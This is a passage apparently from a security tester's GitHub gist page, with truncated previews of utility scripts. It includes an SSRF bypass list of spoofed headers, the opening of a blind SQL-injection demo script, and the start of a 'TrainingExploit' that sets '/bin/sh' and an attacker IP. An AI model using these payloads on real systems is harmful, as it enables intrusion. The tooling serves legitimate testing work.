richardc richardcurteis
richardcurteis
/ gist:abce13f23baa2d11aff3d94a3635737b
Created
August 8, 2022 11:29
SSRFBypassList.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Base-Url: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| Http-Url: 127.0.0.1 | |
| Proxy-Host: 127.0.0.1 | |
| Proxy-Url: 127.0.0.1 | |
| Real-Ip: 127.0.0.1 | |
| Redirect: 127.0.0.1 | |
| Referer: 127.0.0.1 | |
| Referrer: 127.0.0.1 | |
| Refferer: 127.0.0.1 |
richardcurteis
/ minimal-root-user-setup.sh
Last active
July 1, 2022 07:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Include a new non-root username and the public SSH key for that user | |
| newuser= | |
| pubkey= | |
| if [ -z $newuser ] | |
| then | |
| echo "[!] Missing username." | |
| exit 1 |
richardcurteis
/ time_based_blind_sqli.py
Last active
May 18, 2022 18:24
Very hacky basic demo script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import datetime | |
| from requests import Session | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| URL = "https://some_host" | |
| ENDPOINT = "/SOMEPATH" | |
| PROXIES = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" } # Running with this set in send_post(0 will let you debug script with Burp |
richardcurteis
/ generate.sh
Created
November 18, 2021 11:30
Generating certificates and CSRs with extended key usage flags. -des3 is removed from genrsa lines to prevent password prompts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| openssl genrsa -out ca.key 4096 | |
| openssl req -new -x509 -days 365 -key ca.key -out ca.crt -addext 'extendedKeyUsage=1.3.6.1.5.5.7.3.4,1.3.6.1.5.5.7.3.2' | |
| openssl genrsa -out client.key 4096 | |
| openssl req -new -key client.key -out client.csr | |
| # self-signed | |
| openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out client.crt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # nslookup and IP address extraction for a file of FQDN hosts | |
| for host in cat $( cat fqdns.txt ) ; do nslookup $host | egrep "^(:?Address:).*([0-9]{1,3}\.){3}[0-9]{1,3}$" | awk '{ print $2 }' >> hosts_from_fqdn.txt ; cat hosts_from_fqdn.txt | sort -u > t ; cp t hosts_from_fqdn.txt ; rm t ; done |
richardcurteis
/ setup-kali.sh
Last active
September 1, 2021 09:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ $# -eq 0 ]];then | |
| echo "[!] Email must be provided for Git SSH key" | |
| exit 1 | |
| fi | |
| sudo passwd kali | |
| USER=`whoami` |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ $# -eq 0 ]];then | |
| echo "[!] Email must be provided for Git SSH key" | |
| exit 1 | |
| fi | |
| USER=`whoami` | |
| sudo apt-get update && sudo apt-get upgrade -y |
richardcurteis
/ python-https-simple-server.py
Last active
December 3, 2021 15:28
Simple HTTP/S Python3 server with configurable headers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # generate server.pem with the following command: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python3 simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:8443 | |
| #!/usr/bin/env python3 | |
| from http import server | |
| import ssl |
richardcurteis
/ parse_cidrs.py
Last active
July 19, 2021 23:52
Parse input file of IP addresses and print all plain addresses and all possible addresses with CIDR notation ranges
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import ipaddress | |
| import sys | |
| import re | |
| VALID_HOSTS = [] | |
| INFILE = [] | |
| def enum_cidr(host): |
richardcurteis
/ TrainingExploit
Created
July 15, 2021 15:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import requests | |
| import base64 | |
| target = f"http://127.0.0.1:3000/" | |
| cmd = "/bin/sh" | |
| attackerIp = "127.0.0.1" |
NewerOlder